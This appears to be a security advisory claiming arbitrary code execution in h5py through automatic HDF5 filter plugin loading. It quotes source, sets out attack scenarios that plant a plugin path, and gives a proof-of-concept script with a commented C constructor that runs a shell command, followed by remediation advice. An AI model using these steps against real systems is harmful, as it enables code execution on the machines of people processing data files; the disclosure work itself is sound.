Arbitrary Code Execution via Automatic HDF5 Filter Plugin Loading in h5py
Target
- Project: h5py/h5py
- URL: https://github.com/h5py/h5py
- Component: HDF5 filter pipeline / dataset read path
- CWE: CWE-94 (Improper Control of Generation of Code / Code Injection)
Severity: HIGH
Summary
When h5py opens an HDF5 file and reads a dataset that uses a custom (non-builtin) compression filter, the underlying HDF5 library automatically searches for and loads a shared library (.so/.dll) filter plugin from directories in the plugin search path. h5py exposes APIs (h5py.h5pl) to manipulate this search path but does nothing to restrict or disable this automatic dynamic loading behavior. A crafted HDF5 file specifying a custom filter ID will cause HDF5 to load and execute arbitrary code from a shared library placed in the plugin search path -- which can be controlled via the HDF5_PLUGIN_PATH environment variable or through the h5py.h5pl.append()/prepend() APIs.
Vulnerable Code
File: h5py/h5py/h5z.pyx (lines 102-121)
@with_phil
def register_filter(uintptr_t cls_pointer_address):
'''(INT cls_pointer_address) => BOOL
Register a new filter from the memory address of a buffer containing a
``H5Z_class1_t`` or ``H5Z_class2_t`` data structure describing the filter.
`cls_pointer_address` can be retrieved from a HDF5 filter plugin dynamic
library::
import ctypes
filter_clib = ctypes.CDLL("/path/to/my_hdf5_filter_plugin.so")
filter_clib.H5PLget_plugin_info.restype = ctypes.c_void_p
h5py.h5z.register_filter(filter_clib.H5PLget_plugin_info())
'''
return <int>H5Zregister(<const void *>cls_pointer_address) >= 0
File: h5py/h5py/h5pl.pyx (lines 20-25)
cpdef append(const char* search_path):
"""(STRING search_path)
Add a directory to the end of the plugin search path.
"""
H5PLappend(search_path)
File: h5py/h5py/_hl/filters.py (lines 295-299)
When a dataset is created with an integer filter ID, h5py passes it directly to HDF5:
elif isinstance(compression, int):
if not allow_unknown_filter and not h5z.filter_avail(compression):
raise ValueError("Unknown compression filter number: %s" % compression)
plist.set_filter(compression, h5z.FLAG_OPTIONAL, compression_opts)
Automatic Plugin Loading (HDF5 library behavior)
When H5Dread() is called on a dataset with a filter ID that is not currently registered, HDF5 searches the plugin path for .so/.dll files, loads them via dlopen(), calls H5PLget_plugin_info() to obtain the filter class, and registers it automatically. This happens transparently inside:
h5py/h5py/_proxy.templ.pyxline 120:H5Dread(dset, mtype, mspace, fspace, dxpl, progbuf)h5py/h5py/_proxy.templ.pyxline 151:H5Dread(dset, dstype, cspace, fspace, dxpl, conv_buf)
Exploitation
Attack Scenario 1: Crafted HDF5 file + environment manipulation
- An attacker sets
HDF5_PLUGIN_PATHto a directory they control (e.g., via.bashrcmanipulation, Docker environment, or CI/CD configuration) - They place a malicious
.sofile in that directory implementing theH5PLget_plugin_infosymbol - They provide a crafted HDF5 file with a dataset using a custom filter ID matching their plugin
- When the victim opens the file and reads the dataset with h5py, the malicious shared library is automatically loaded and its code executes
Attack Scenario 2: h5pl API abuse in shared environments
In applications where users can influence the plugin path via h5py.h5pl.append() before file loading:
import h5py
# Attacker injects malicious plugin path
h5py.h5pl.append(b'/attacker/controlled/path')
# Later, when legitimate code reads a crafted HDF5 file:
with h5py.File('crafted.h5', 'r') as f:
data = f['dataset'][:] # Triggers plugin loading -> RCE
Proof of Concept
import h5py
import numpy as np
import struct
import tempfile
import os
# Step 1: Create a malicious shared library (filter plugin)
# In practice, compile a .so with H5PLget_plugin_info that runs arbitrary code
# For demonstration, this would be:
# gcc -shared -o malicious_filter.so -fPIC malicious_filter.c
# Where malicious_filter.c contains:
# #include <stdlib.h>
# void __attribute__((constructor)) init() { system("id > /tmp/pwned"); }
# Step 2: Set plugin path
os.environ['HDF5_PLUGIN_PATH'] = '/tmp/malicious_plugins'
# Step 3: Create HDF5 file with custom filter
CUSTOM_FILTER_ID = 32000 # Use a non-standard filter ID
with h5py.File('/tmp/crafted.h5', 'w') as f:
# Use allow_unknown_filter to bypass availability check during creation
f.create_dataset(
'payload',
data=np.zeros(100),
compression=CUSTOM_FILTER_ID,
compression_opts=(0,),
chunks=(100,),
allow_unknown_filter=True
)
# Step 4: When any user reads this file, the filter plugin is loaded
with h5py.File('/tmp/crafted.h5', 'r') as f:
data = f['payload'][:] # This triggers automatic plugin search and dlopen()
Impact
- Arbitrary code execution in the context of the process reading the HDF5 file
- This is particularly dangerous in:
- Data science pipelines that process untrusted HDF5 files
- ML model loading (Keras/TensorFlow models are stored as HDF5)
- Scientific data sharing workflows
- Jupyter notebook environments processing external data
- h5py provides no mechanism to disable automatic filter plugin loading
- The
allow_unknown_filter=Trueparameter on dataset creation is designed for this workflow, explicitly supporting the use case
Remediation
- Provide an option to disable automatic filter plugin loading when opening files for reading. HDF5 1.10+ supports
H5PLset_loading_state()to disable plugin loading. - Add a security warning in documentation about the risks of processing untrusted HDF5 files
- Consider defaulting to disabled plugin loading for read-only file access, requiring explicit opt-in
- Validate or restrict plugin paths added via
h5pl.append()/prepend()
References
- HDF5 Dynamic Plugin Loading: https://docs.hdfgroup.org/hdf5/develop/group___h5_p_l.html
- HDF5 Filter Plugins: https://github.com/HDFGroup/hdf5_plugins
- h5py filter documentation: https://docs.h5py.org/en/stable/high/dataset.html#filter-pipeline